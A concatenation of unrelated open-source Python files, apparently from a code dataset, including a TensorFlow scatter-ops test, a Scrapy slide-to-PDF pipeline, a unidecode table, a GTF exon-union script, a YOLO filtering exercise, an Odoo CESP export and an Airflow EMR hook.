ref[indx] *= update
def _NumpyDiv(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] /= updates[i]
def _NumpyDivScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] /= update
def _NumpyMin(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = np.minimum(ref[indx], updates[i])
def _NumpyMinScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = np.minimum(ref[indx], update)
def _NumpyMax(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = np.maximum(ref[indx], updates[i])
def _NumpyMaxScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = np.maximum(ref[indx], update)
def _NumpyUpdate(ref, indices, updates):
for i, indx in np.ndenumerate(indices):
ref[indx] = updates[i]
def _NumpyUpdateScalar(ref, indices, update):
for _, indx in np.ndenumerate(indices):
ref[indx] = update
_TF_OPS_TO_NUMPY = {
state_ops.scatter_update: _NumpyUpdate,
state_ops.scatter_add: _NumpyAdd,
state_ops.scatter_sub: _NumpySub,
state_ops.scatter_mul: _NumpyMul,
state_ops.scatter_div: _NumpyDiv,
state_ops.scatter_min: _NumpyMin,
state_ops.scatter_max: _NumpyMax,
}
_TF_OPS_TO_NUMPY_SCALAR = {
state_ops.scatter_update: _NumpyUpdateScalar,
state_ops.scatter_add: _NumpyAddScalar,
state_ops.scatter_sub: _NumpySubScalar,
state_ops.scatter_mul: _NumpyMulScalar,
state_ops.scatter_div: _NumpyDivScalar,
state_ops.scatter_min: _NumpyMinScalar,
state_ops.scatter_max: _NumpyMaxScalar,
}
class ScatterTest(test.TestCase):
def _VariableRankTest(self,
tf_scatter,
vtype,
itype,
repeat_indices=False,
updates_are_scalar=False):
np.random.seed(8)
with self.cached_session(use_gpu=True):
for indices_shape in (), (2,), (3, 7), (3, 4, 7):
for extra_shape in (), (5,), (5, 9):
# Generate random indices with no duplicates for easy numpy comparison
size = np.prod(indices_shape, dtype=itype)
first_dim = 3 * size
indices = np.arange(first_dim)
np.random.shuffle(indices)
indices = indices[:size]
if size > 1 and repeat_indices:
# Add some random repeats.
indices = indices[:size // 2]
for _ in range(size - size // 2):
# Randomly append some repeats.
indices = np.append(indices,
indices[np.random.randint(size // 2)])
np.random.shuffle(indices)
indices = indices.reshape(indices_shape)
if updates_are_scalar:
updates = _AsType(np.random.randn(), vtype)
else:
updates = _AsType(
np.random.randn(*(indices_shape + extra_shape)), vtype)
# Clips small values to avoid division by zero.
def clip_small_values(x):
threshold = 1e-4
sign = np.sign(x)
if isinstance(x, np.int32):
threshold = 1
sign = np.random.choice([-1, 1])
return threshold * sign if np.abs(x) < threshold else x
updates = np.vectorize(clip_small_values)(updates)
old = _AsType(np.random.randn(*((first_dim,) + extra_shape)), vtype)
# Scatter via numpy
new = old.copy()
if updates_are_scalar:
np_scatter = _TF_OPS_TO_NUMPY_SCALAR[tf_scatter]
else:
np_scatter = _TF_OPS_TO_NUMPY[tf_scatter]
np_scatter(new, indices, updates)
# Scatter via tensorflow
ref = variables.VariableV1(old)
ref.initializer.run()
tf_scatter(ref, indices, updates).eval()
self.assertAllClose(ref.eval(), new)
def _VariableRankTests(self,
tf_scatter,
repeat_indices=False,
updates_are_scalar=False):
vtypes = [np.float32, np.float64]
if tf_scatter != state_ops.scatter_div:
vtypes.append(np.int32)
for vtype in vtypes:
for itype in (np.int32, np.int64):
self._VariableRankTest(tf_scatter, vtype, itype, repeat_indices,
updates_are_scalar)
def testVariableRankUpdate(self):
self._VariableRankTests(state_ops.scatter_update, False)
def testVariableRankAdd(self):
self._VariableRankTests(state_ops.scatter_add, False)
def testVariableRankSub(self):
self._VariableRankTests(state_ops.scatter_sub, False)
def testVariableRankMul(self):
self._VariableRankTests(state_ops.scatter_mul, False)
def testVariableRankDiv(self):
self._VariableRankTests(state_ops.scatter_div, False)
def testVariableRankMin(self):
self._VariableRankTests(state_ops.scatter_min, False)
def testVariableRankMax(self):
self._VariableRankTests(state_ops.scatter_max, False)
def testRepeatIndicesAdd(self):
self._VariableRankTests(state_ops.scatter_add, True)
def testRepeatIndicesSub(self):
self._VariableRankTests(state_ops.scatter_sub, True)
def testRepeatIndicesMul(self):
self._VariableRankTests(state_ops.scatter_mul, True)
def testRepeatIndicesDiv(self):
self._VariableRankTests(state_ops.scatter_div, True)
def testRepeatIndicesMin(self):
self._VariableRankTests(state_ops.scatter_min, True)
def testRepeatIndicesMax(self):
self._VariableRankTests(state_ops.scatter_max, True)
def testVariableRankUpdateScalar(self):
self._VariableRankTests(state_ops.scatter_update, False, True)
def testVariableRankAddScalar(self):
self._VariableRankTests(state_ops.scatter_add, False, True)
def testVariableRankSubScalar(self):
self._VariableRankTests(state_ops.scatter_sub, False, True)
def testVariableRankMulScalar(self):
self._VariableRankTests(state_ops.scatter_mul, False, True)
def testVariableRankDivScalar(self):
self._VariableRankTests(state_ops.scatter_div, False, True)
def testVariableRankMinScalar(self):
self._VariableRankTests(state_ops.scatter_min, False, True)
def testVariableRankMaxScalar(self):
self._VariableRankTests(state_ops.scatter_max, False, True)
def testRepeatIndicesAddScalar(self):
self._VariableRankTests(state_ops.scatter_add, True, True)
def testRepeatIndicesSubScalar(self):
self._VariableRankTests(state_ops.scatter_sub, True, True)
def testRepeatIndicesMulScalar(self):
self._VariableRankTests(state_ops.scatter_mul, True, True)
def testRepeatIndicesDivScalar(self):
self._VariableRankTests(state_ops.scatter_div, True, True)
def testRepeatIndicesMinScalar(self):
self._VariableRankTests(state_ops.scatter_min, True, True)
def testRepeatIndicesMaxScalar(self):
self._VariableRankTests(state_ops.scatter_max, True, True)
def testBooleanScatterUpdate(self):
if not test.is_gpu_available():
with self.session(use_gpu=False) as session:
var = variables.Variable([True, False])
update0 = state_ops.scatter_update(var, 1, True)
update1 = state_ops.scatter_update(
var, constant_op.constant(
0, dtype=dtypes.int64), False)
var.initializer.run()
session.run([update0, update1])
self.assertAllEqual([False, True], self.evaluate(var))
def testScatterOutOfRangeCpu(self):
for op, _ in _TF_OPS_TO_NUMPY.items():
params = np.array([1, 2, 3, 4, 5, 6]).astype(np.float32)
updates = np.array([-3, -4, -5]).astype(np.float32)
if not test.is_gpu_available():
with self.session(use_gpu=False):
ref = variables.VariableV1(params)
ref.initializer.run()
# Indices all in range, no problem.
indices = np.array([2, 0, 5])
op(ref, indices, updates).eval()
# Test some out of range errors.
indices = np.array([-1, 0, 5])
with self.assertRaisesOpError(
r'indices\[0\] = -1 is not in \[0, 6\)'):
op(ref, indices, updates).eval()
indices = np.array([2, 0, 6])
with self.assertRaisesOpError(r'indices\[2\] = 6 is not in \[0, 6\)'):
op(ref, indices, updates).eval()
# TODO(fpmc): Re-enable this test when gpu_pip test actually runs on a GPU.
def _disabledTestScatterOutOfRangeGpu(self):
if test.is_gpu_available():
return
for op, _ in _TF_OPS_TO_NUMPY.items():
params = np.array([1, 2, 3, 4, 5, 6]).astype(np.float32)
updates = np.array([-3, -4, -5]).astype(np.float32)
# With GPU, the code ignores indices that are out of range.
# We don't test the implementation; just test there's no failures.
with self.cached_session(force_gpu=True):
ref = variables.Variable(params)
ref.initializer.run()
# Indices all in range, no problem.
indices = np.array([2, 0, 5])
op(ref, indices, updates).eval()
        # Indices out of range should not fail.
indices = np.array([-1, 0, 5])
op(ref, indices, updates).eval()
indices = np.array([2, 0, 6])
op(ref, indices, updates).eval()
if __name__ == '__main__':
test.main()
| brchiu/tensorflow | tensorflow/python/kernel_tests/scatter_ops_test.py | Python | apache-2.0 | 11,256 |
import re
import subprocess
import weakref
from scrapy.contrib.pipeline.files import FilesPipeline
from scrapy.exceptions import DropItem
from scrapy.utils.httpobj import urlparse_cached
from twisted.internet import threads
class SlideDefaults(object):
"""Set up defaults items."""
def process_item(self, item, spider):
if not item.get('id'):
raise DropItem("item id is missing")
item['spider'] = spider.name
return item
class SlideImages(FilesPipeline):
"""Downloads slide images."""
DEFAULT_FILES_URLS_FIELD = 'image_urls'
DEFAULT_FILES_RESULT_FIELD = 'images'
def get_media_requests(self, item, info):
reqs = super(SlideImages, self).get_media_requests(item, info)
self._load_keys(reqs, item)
return reqs
def _load_keys(self, requests, item):
# Preload file paths into the requests because we use the item data to
# generate the path.
for req in requests:
pr = urlparse_cached(req)
# filename is last part of the URL path.
image = pr.path.rpartition('/')[-1]
req.meta['file_path'] = '/{spider}/{slide_id}/{image}'.format(
spider=item['spider'],
slide_id=item['id'],
image=image,
)
def file_path(self, request, response=None, info=None):
return request.meta['file_path']
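    # Illustrative result (hypothetical item): for spider 'slides', item id '42' and an
    # image URL ending in 'slide-1.jpg', the stored path becomes '/slides/42/slide-1.jpg'.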
class SlidePDF(object):
"""Converts slides images to PDF."""
def process_item(self, item, spider):
if not item.get('images'):
raise DropItem("no images found")
return threads.deferToThread(self._convert, item, spider)
def _convert(self, item, spider):
image_paths = [im['path'] for im in item['images']]
datapath = spider.crawler.settings['FILES_STORE']
image_files = [datapath + path for path in image_paths]
item['pdf_file'] = '%s.pdf' % item['id']
dest = '{root}/{spider}/{file}'.format(
root=datapath,
spider=item['spider'],
file=item['pdf_file'],
)
# Use convert command from ImageMagick.
cmd = ['convert'] + image_files + [dest]
try:
# TODO: capture errors
subprocess.check_call(cmd, stdout=subprocess.PIPE)
except subprocess.CalledProcessError:
raise DropItem("failed to generate PDF")
return item
| rolando/scrapy-slidebot | slidebot/pipelines.py | Python | mit | 2,428 |
data = (
'Hai ', # 0x00
'Ren ', # 0x01
'Tian ', # 0x02
'Jiao ', # 0x03
'Jia ', # 0x04
'Bing ', # 0x05
'Yao ', # 0x06
'Tong ', # 0x07
'Ci ', # 0x08
'Xiang ', # 0x09
'Yang ', # 0x0a
'Yang ', # 0x0b
'Er ', # 0x0c
'Yan ', # 0x0d
'Le ', # 0x0e
'Yi ', # 0x0f
'Can ', # 0x10
'Bo ', # 0x11
'Nei ', # 0x12
'E ', # 0x13
'Bu ', # 0x14
'Jun ', # 0x15
'Dou ', # 0x16
'Su ', # 0x17
'Yu ', # 0x18
'Shi ', # 0x19
'Yao ', # 0x1a
'Hun ', # 0x1b
'Guo ', # 0x1c
'Shi ', # 0x1d
'Jian ', # 0x1e
'Zhui ', # 0x1f
'Bing ', # 0x20
'Xian ', # 0x21
'Bu ', # 0x22
'Ye ', # 0x23
'Tan ', # 0x24
'Fei ', # 0x25
'Zhang ', # 0x26
'Wei ', # 0x27
'Guan ', # 0x28
'E ', # 0x29
'Nuan ', # 0x2a
'Hun ', # 0x2b
'Hu ', # 0x2c
'Huang ', # 0x2d
'Tie ', # 0x2e
'Hui ', # 0x2f
'Jian ', # 0x30
'Hou ', # 0x31
'He ', # 0x32
'Xing ', # 0x33
'Fen ', # 0x34
'Wei ', # 0x35
'Gu ', # 0x36
'Cha ', # 0x37
'Song ', # 0x38
'Tang ', # 0x39
'Bo ', # 0x3a
'Gao ', # 0x3b
'Xi ', # 0x3c
'Kui ', # 0x3d
'Liu ', # 0x3e
'Sou ', # 0x3f
'Tao ', # 0x40
'Ye ', # 0x41
'Yun ', # 0x42
'Mo ', # 0x43
'Tang ', # 0x44
'Man ', # 0x45
'Bi ', # 0x46
'Yu ', # 0x47
'Xiu ', # 0x48
'Jin ', # 0x49
'San ', # 0x4a
'Kui ', # 0x4b
'Zhuan ', # 0x4c
'Shan ', # 0x4d
'Chi ', # 0x4e
'Dan ', # 0x4f
'Yi ', # 0x50
'Ji ', # 0x51
'Rao ', # 0x52
'Cheng ', # 0x53
'Yong ', # 0x54
'Tao ', # 0x55
'Hui ', # 0x56
'Xiang ', # 0x57
'Zhan ', # 0x58
'Fen ', # 0x59
'Hai ', # 0x5a
'Meng ', # 0x5b
'Yan ', # 0x5c
'Mo ', # 0x5d
'Chan ', # 0x5e
'Xiang ', # 0x5f
'Luo ', # 0x60
'Zuan ', # 0x61
'Nang ', # 0x62
'Shi ', # 0x63
'Ding ', # 0x64
'Ji ', # 0x65
'Tuo ', # 0x66
'Xing ', # 0x67
'Tun ', # 0x68
'Xi ', # 0x69
'Ren ', # 0x6a
'Yu ', # 0x6b
'Chi ', # 0x6c
'Fan ', # 0x6d
'Yin ', # 0x6e
'Jian ', # 0x6f
'Shi ', # 0x70
'Bao ', # 0x71
'Si ', # 0x72
'Duo ', # 0x73
'Yi ', # 0x74
'Er ', # 0x75
'Rao ', # 0x76
'Xiang ', # 0x77
'Jia ', # 0x78
'Le ', # 0x79
'Jiao ', # 0x7a
'Yi ', # 0x7b
'Bing ', # 0x7c
'Bo ', # 0x7d
'Dou ', # 0x7e
'E ', # 0x7f
'Yu ', # 0x80
'Nei ', # 0x81
'Jun ', # 0x82
'Guo ', # 0x83
'Hun ', # 0x84
'Xian ', # 0x85
'Guan ', # 0x86
'Cha ', # 0x87
'Kui ', # 0x88
'Gu ', # 0x89
'Sou ', # 0x8a
'Chan ', # 0x8b
'Ye ', # 0x8c
'Mo ', # 0x8d
'Bo ', # 0x8e
'Liu ', # 0x8f
'Xiu ', # 0x90
'Jin ', # 0x91
'Man ', # 0x92
'San ', # 0x93
'Zhuan ', # 0x94
'Nang ', # 0x95
'Shou ', # 0x96
'Kui ', # 0x97
'Guo ', # 0x98
'Xiang ', # 0x99
'Fen ', # 0x9a
'Ba ', # 0x9b
'Ni ', # 0x9c
'Bi ', # 0x9d
'Bo ', # 0x9e
'Tu ', # 0x9f
'Han ', # 0xa0
'Fei ', # 0xa1
'Jian ', # 0xa2
'An ', # 0xa3
'Ai ', # 0xa4
'Fu ', # 0xa5
'Xian ', # 0xa6
'Wen ', # 0xa7
'Xin ', # 0xa8
'Fen ', # 0xa9
'Bin ', # 0xaa
'Xing ', # 0xab
'Ma ', # 0xac
'Yu ', # 0xad
'Feng ', # 0xae
'Han ', # 0xaf
'Di ', # 0xb0
'Tuo ', # 0xb1
'Tuo ', # 0xb2
'Chi ', # 0xb3
'Xun ', # 0xb4
'Zhu ', # 0xb5
'Zhi ', # 0xb6
'Pei ', # 0xb7
'Xin ', # 0xb8
'Ri ', # 0xb9
'Sa ', # 0xba
'Yin ', # 0xbb
'Wen ', # 0xbc
'Zhi ', # 0xbd
'Dan ', # 0xbe
'Lu ', # 0xbf
'You ', # 0xc0
'Bo ', # 0xc1
'Bao ', # 0xc2
'Kuai ', # 0xc3
'Tuo ', # 0xc4
'Yi ', # 0xc5
'Qu ', # 0xc6
None, # 0xc7
'Qu ', # 0xc8
'Jiong ', # 0xc9
'Bo ', # 0xca
'Zhao ', # 0xcb
'Yuan ', # 0xcc
'Peng ', # 0xcd
'Zhou ', # 0xce
'Ju ', # 0xcf
'Zhu ', # 0xd0
'Nu ', # 0xd1
'Ju ', # 0xd2
'Pi ', # 0xd3
'Zang ', # 0xd4
'Jia ', # 0xd5
'Ling ', # 0xd6
'Zhen ', # 0xd7
'Tai ', # 0xd8
'Fu ', # 0xd9
'Yang ', # 0xda
'Shi ', # 0xdb
'Bi ', # 0xdc
'Tuo ', # 0xdd
'Tuo ', # 0xde
'Si ', # 0xdf
'Liu ', # 0xe0
'Ma ', # 0xe1
'Pian ', # 0xe2
'Tao ', # 0xe3
'Zhi ', # 0xe4
'Rong ', # 0xe5
'Teng ', # 0xe6
'Dong ', # 0xe7
'Xun ', # 0xe8
'Quan ', # 0xe9
'Shen ', # 0xea
'Jiong ', # 0xeb
'Er ', # 0xec
'Hai ', # 0xed
'Bo ', # 0xee
'Zhu ', # 0xef
'Yin ', # 0xf0
'Luo ', # 0xf1
'Shuu ', # 0xf2
'Dan ', # 0xf3
'Xie ', # 0xf4
'Liu ', # 0xf5
'Ju ', # 0xf6
'Song ', # 0xf7
'Qin ', # 0xf8
'Mang ', # 0xf9
'Liang ', # 0xfa
'Han ', # 0xfb
'Tu ', # 0xfc
'Xuan ', # 0xfd
'Tui ', # 0xfe
'Jun ', # 0xff
)
| avian2/unidecode | unidecode/x099.py | Python | gpl-2.0 | 4,627 |
#!/home/paulk/software/bin/python
from __future__ import division
import sys,os,time,gzip
import cPickle,pysam,random,math
import pylab
from multiprocessing import Process,Queue
import numpy
"""
Synopsis
Given a GTF file of genes, transcripts (txs) and exons, prints to stdout the union
of each gene's exons over all of its transcripts.
"""
def usage():
print >> sys.stderr,"""Script to determine the union of exons over txs
Usage: ./gene2exons.py <GTF> <exon_file>
	Results are printed to stdout.
Output (tab-delimited): gene_id,chrom,exon_no,start,end"""
class Interval:
def __init__(self,st,sp):
self.l = st
self.r = sp
def union(self,I):
		# the union is taken as the smallest interval covering both operands
		L = min(self.l, I.l)
		R = max(self.r, I.r)
		return Interval(L, R)
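	# Illustrative example (hypothetical coordinates): Interval(5, 10).union(Interval(8, 20))
	# covers both operands and is equivalent to Interval(5, 20).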
try:
gtf_file = sys.argv[1]
except IndexError:
print >> sys.stderr,"Error: Enter GTF file"
usage()
sys.exit(1)
try:
exonsfile = sys.argv[2]
except IndexError:
print >> sys.stderr,"Error: Enter exons file"
usage()
sys.exit(1)
# tx2gene
gene2tx = dict()
f = open(gtf_file,'r')
for l in f:
line = l.strip().split('\t')
_data = line[8].split(';')
data = [each.strip() for each in _data]
tx = data[1][15:-1]
gene = data[0][9:-1]
if gene not in gene2tx:
gene2tx[gene] = [tx]
else:
gene2tx[gene] += [tx]
f.close()
print >> sys.stderr,"[%s] Read GTF." % (time.ctime(time.time()))
# tx2exons
tx2exons = dict()
f = open(exonsfile,'r')
for line in f:
l = line.strip().split('\t')
tx_id = l[0]
st = int(l[3])
sp = int(l[4])
no = int(l[1])
chrom = l[2]
if tx_id not in tx2exons:
tx2exons[tx_id] = dict()
else:
pass
tx2exons[tx_id][no] = Interval(st,sp)
tx2exons[tx_id]['chrom'] = chrom
f.close()
print >> sys.stderr,"[%s] Read exons." % (time.ctime(time.time()))
# genes2exons
gene2exons = dict()
for gene in gene2tx:
for tx in gene2tx[gene]:
if not tx2exons.has_key(tx): continue
for no in tx2exons[tx]:
if gene not in gene2exons:
gene2exons[gene] = dict()
gene2exons[gene]['chrom'] = tx2exons[tx]['chrom']
else:
pass
if no not in gene2exons[gene] and no != 'chrom':
gene2exons[gene][no] = tx2exons[tx][no]
elif no in gene2exons[gene] and no != 'chrom':
gene2exons[gene][no] = gene2exons[gene][no].union(tx2exons[tx][no])
print >> sys.stderr,"[%s] Built gene->exons." % (time.ctime(time.time()))
for gene in gene2exons:
for no in gene2exons[gene]:
if no == 'chrom': continue
print "%s\t%s\t%s\t%s\t%s" % (gene,gene2exons[gene]['chrom'],no,gene2exons[gene][no].l,gene2exons[gene][no].r)
| polarise/RP-python | gene2exons.py | Python | gpl-2.0 | 2,496 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DayDetails(Model):
"""Properties of a daily schedule.
:param time: The time of day the schedule will occur.
:type time: str
"""
_attribute_map = {
'time': {'key': 'time', 'type': 'str'},
}
def __init__(self, time=None):
self.time = time
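# Usage sketch (hypothetical value): DayDetails(time='19:00') describes a
# daily schedule entry; the service consumes the time of day as a string.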
| v-iam/azure-sdk-for-python | azure-mgmt-devtestlabs/azure/mgmt/devtestlabs/models/day_details.py | Python | mit | 805 |
# coding:utf-8
'''
Created on 2017/11/22.
@author: chk01
'''
import argparse
import os
import matplotlib.pyplot as plt
from matplotlib.pyplot import imshow
import scipy.io
import scipy.misc
import numpy as np
import pandas as pd
import PIL
import tensorflow as tf
from keras import backend as K
from keras.layers import Input, Lambda, Conv2D
from keras.models import load_model, Model
from class_four.week_three.yolo_utils import read_classes, read_anchors, generate_colors, preprocess_image, draw_boxes, \
scale_boxes
from class_four.week_three.yad2k.models.keras_yolo import yolo_head, yolo_boxes_to_corners, preprocess_true_boxes, \
yolo_loss, yolo_body
def yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=.6):
"""Filters YOLO boxes by thresholding on object and class confidence.
Arguments:
box_confidence -- tensor of shape (19, 19, 5, 1)
boxes -- tensor of shape (19, 19, 5, 4)
box_class_probs -- tensor of shape (19, 19, 5, 80)
threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
Returns:
scores -- tensor of shape (None,), containing the class probability score for selected boxes
boxes -- tensor of shape (None, 4), containing (b_x, b_y, b_h, b_w) coordinates of selected boxes
classes -- tensor of shape (None,), containing the index of the class detected by the selected boxes
Note: "None" is here because you don't know the exact number of selected boxes, as it depends on the threshold.
For example, the actual output size of scores would be (10,) if there are 10 boxes.
"""
# Step 1: Compute box scores
### START CODE HERE ### (≈ 1 line)
box_scores = box_confidence * box_class_probs
print(box_scores.shape)
### END CODE HERE ###
# Step 2: Find the box_classes thanks to the max box_scores, keep track of the corresponding score
### START CODE HERE ### (≈ 2 lines)
box_classes = K.argmax(box_scores, axis=-1)
print(box_classes.shape)
print(box_classes)
    box_class_scores = K.max(box_scores, axis=-1)
print(box_class_scores.shape)
### END CODE HERE ###
# Step 3: Create a filtering mask based on "box_class_scores" by using "threshold". The mask should have the
# same dimension as box_class_scores, and be True for the boxes you want to keep (with probability >= threshold)
### START CODE HERE ### (≈ 1 line)
    filtering_mask = box_class_scores >= threshold
### END CODE HERE ###
# Step 4: Apply the mask to scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
    scores = tf.boolean_mask(box_class_scores, filtering_mask)
    boxes = tf.boolean_mask(boxes, filtering_mask)
    classes = tf.boolean_mask(box_classes, filtering_mask)
### END CODE HERE ###
return scores, boxes, classes
with tf.Session() as test_a:
box_confidence = tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed=1)
boxes = tf.random_normal([19, 19, 5, 4], mean=1, stddev=4, seed=1)
box_class_probs = tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed=1)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=0.5)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.shape))
print("boxes.shape = " + str(boxes.shape))
print("classes.shape = " + str(classes.shape))
| sunyihuan326/DeltaLab | Andrew_NG_learning/class_four/week_three/Dxq_1.py | Python | mit | 3,398 |
from cProfile import run
from reg import dispatch
from reg import LruCachingKeyLookup
def get_key_lookup(r):
return LruCachingKeyLookup(
r,
component_cache_size=5000,
all_cache_size=5000,
fallback_cache_size=5000,
)
@dispatch(get_key_lookup=get_key_lookup)
def args0():
raise NotImplementedError()
@dispatch("a", get_key_lookup=get_key_lookup)
def args1(a):
raise NotImplementedError()
@dispatch("a", "b", get_key_lookup=get_key_lookup)
def args2(a, b):
raise NotImplementedError()
@dispatch("a", "b", "c", get_key_lookup=get_key_lookup)
def args3(a, b, c):
raise NotImplementedError()
@dispatch("a", "b", "c", "d", get_key_lookup=get_key_lookup)
def args4(a, b, c, d):
raise NotImplementedError()
class Foo:
pass
def myargs0():
return "args0"
def myargs1(a):
return "args1"
def myargs2(a, b):
return "args2"
def myargs3(a, b, c):
return "args3"
def myargs4(a, b, c, d):
return "args4"
args0.register(myargs0)
args1.register(myargs1, a=Foo)
args2.register(myargs2, a=Foo, b=Foo)
args3.register(myargs3, a=Foo, b=Foo, c=Foo)
args4.register(myargs4, a=Foo, b=Foo, c=Foo, d=Foo)
def repeat_args4():
for i in range(10000):
args4(Foo(), Foo(), Foo(), Foo())
run("repeat_args4()", sort="tottime")
| morepath/reg | profdispatch.py | Python | bsd-3-clause | 1,317 |
# -*- coding: utf-8 -*-
##############################################################################
# For copyright and license notices, see __openerp__.py file in module root
# directory
##############################################################################
from openerp import models, fields, api
import base64
from afip_cesp import escribir, LIQUIDACION_SP
import datetime
class infocoop_tab_fact(models.Model):
_inherit = "infocoop_tab_fact"
cesp_data = fields.Binary(string='Cesp')
cesp_filename = fields.Char()
@api.one
def generate_cesp(self):
cesp_data = ""
m1 = int(self.periodo[:2])
y = int(self.periodo[-4:])
p1 = self.periodo
        p2 = str(m1 + 1).zfill(2) + str(y)
if m1 % 2 == 1: # only even
liqs = self.env["infocoop_liquidac"].search(
[("periodo", "in", (p1, p2)), ])
for l in liqs:
socio_id = self.env["infocoop_socios"].search(
[("medido", "=", l.medidor), ("orden", "=", l.orden)],
limit=1)
sm_ids = self.env["infocoop.socios_member"].search(
[("master_id", "=", socio_id.id), ], limit=1)
if sm_ids:
partner_id = sm_ids.slave_id
else:
ingreso_id = self.env["infocoop_ingresos"].search(
[("medidor", "=", l.medidor), ("orden", "=", l.orden)],
limit=1)
im_ids = self.env["infocoop.ingresos_member"].search(
[("master_id", "=", ingreso_id.id), ], limit=1)
partner_id = im_ids.slave_id
print partner_id.name
print partner_id.main_id_number
vals = dict()
vals['cbte_tipo'] = 18 # Liquidacion B
vals['cbt_numero'] = l.numero
vals['cbte_nro_interno'] = l.num_fact
if l.servicios == "/A":
vals['tipo_servicio'] = "A"
vals['pto_vta'] = 3
elif l.servicios == "/E":
vals['tipo_servicio'] = "E"
vals['pto_vta'] = 1
else:
continue
vals['fecha_cbte'] = datetime.date(
year=y, month=m1, day=1)
                # User and account holder
vals['usuario_tiene_info'] = 'S'
vals['titular_tiene_info'] = 'S'
vals['usuario_id'] = l.medidor + l.orden
vals['usuario_nombre'] = socio_id.nombre
vals['titular_nombre'] = socio_id.nombre
if partner_id:
if partner_id.main_id_number\
and partner_id.main_id_category_id:
tipo_doc = \
partner_id.main_id_category_id.afip_code
if tipo_doc:
vals['usuario_tipo_doc'] = tipo_doc
vals['usuario_nro_doc'] = partner_id.main_id_number
vals['titular_tipo_doc'] = tipo_doc
vals['titular_nro_doc'] = partner_id.main_id_number
if partner_id.afip_responsability_type_id:
vals['usuario_impositiva_id'] = \
partner_id.afip_responsability_type_id.code
# vals['titular_inmueble_tiene_info'] = 'N'
# vals['usuario_domicilio_tiene_info'] = 'S'
# vals['usuario_domicilio_calle']= l.prestacion.cliente.domicilio_particular.direccion
# vals['usuario_domicilio_puerta']=l.prestacion.cliente.domicilio_particular.altura
# # vals=['usuario_domicilio_piso']=,
# # vals=['usuario_domicilio_oficina']=,
# vals['usuario_domicilio_cp']=prestacion.cliente.domicilio_particular.codigo_postal
# vals['usuario_domicilio_localidad']=prestacion.cliente.domicilio_particular.localidad.nombre
# # vals=['usuario_domicilio_partido']=
# vals['usuario_domicilio_provincia']=prestacion.cliente.domicilio_particular.provincia.codigo_afi
cesp_data += escribir(vals, LIQUIDACION_SP)
return self.write({
'cesp_filename': 'cesp.txt',
'cesp_data': base64.encodestring(cesp_data)
})
| barct/odoo-coop | infocoop_afip_patch/models/infocoop_tab_fact.py | Python | gpl-3.0 | 4,487 |
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from airflow.exceptions import AirflowException
from airflow.contrib.hooks.aws_hook import AwsHook
class EmrHook(AwsHook):
"""
Interact with AWS EMR. emr_conn_id is only necessary for using the
create_job_flow method.
"""
def __init__(self, emr_conn_id=None, *args, **kwargs):
self.emr_conn_id = emr_conn_id
super(EmrHook, self).__init__(*args, **kwargs)
def get_conn(self):
self.conn = self.get_client_type('emr')
return self.conn
def create_job_flow(self, job_flow_overrides):
"""
Creates a job flow using the config from the EMR connection.
Keys of the json extra hash may have the arguments of the boto3
run_job_flow method.
Overrides for this config may be passed as the job_flow_overrides.
"""
if not self.emr_conn_id:
raise AirflowException('emr_conn_id must be present to use create_job_flow')
emr_conn = self.get_connection(self.emr_conn_id)
config = emr_conn.extra_dejson.copy()
config.update(job_flow_overrides)
response = self.get_conn().run_job_flow(**config)
return response
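# A minimal usage sketch (hypothetical connection ids; the EMR connection's
# "extra" JSON is expected to hold boto3 run_job_flow keyword arguments):
#
#     hook = EmrHook(emr_conn_id='emr_default', aws_conn_id='aws_default')
#     response = hook.create_job_flow({'Name': 'nightly-cluster'})
#     job_flow_id = response['JobFlowId']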
| jgao54/airflow | airflow/contrib/hooks/emr_hook.py | Python | apache-2.0 | 1,979 |
#
# Module implementing synchronization primitives
#
# multiprocessing/synchronize.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition', 'Event'
]
import threading
import sys
import tempfile
import _multiprocessing
from time import time as _time
from . import context
from . import process
from . import util
# Try to import the mp.synchronize module cleanly, if it fails
# raise ImportError for platforms lacking a working sem_open implementation.
# See issue 3770
try:
from _multiprocessing import SemLock, sem_unlink
except (ImportError):
raise ImportError("This platform lacks a functioning sem_open" +
" implementation, therefore, the required" +
" synchronization primitives needed will not" +
" function, see issue 3770.")
#
# Constants
#
RECURSIVE_MUTEX, SEMAPHORE = list(range(2))
SEM_VALUE_MAX = _multiprocessing.SemLock.SEM_VALUE_MAX
#
# Base class for semaphores and mutexes; wraps `_multiprocessing.SemLock`
#
class SemLock(object):
_rand = tempfile._RandomNameSequence()
def __init__(self, kind, value, maxvalue, *, ctx):
if ctx is None:
ctx = context._default_context.get_context()
name = ctx.get_start_method()
unlink_now = sys.platform == 'win32' or name == 'fork'
for i in range(100):
try:
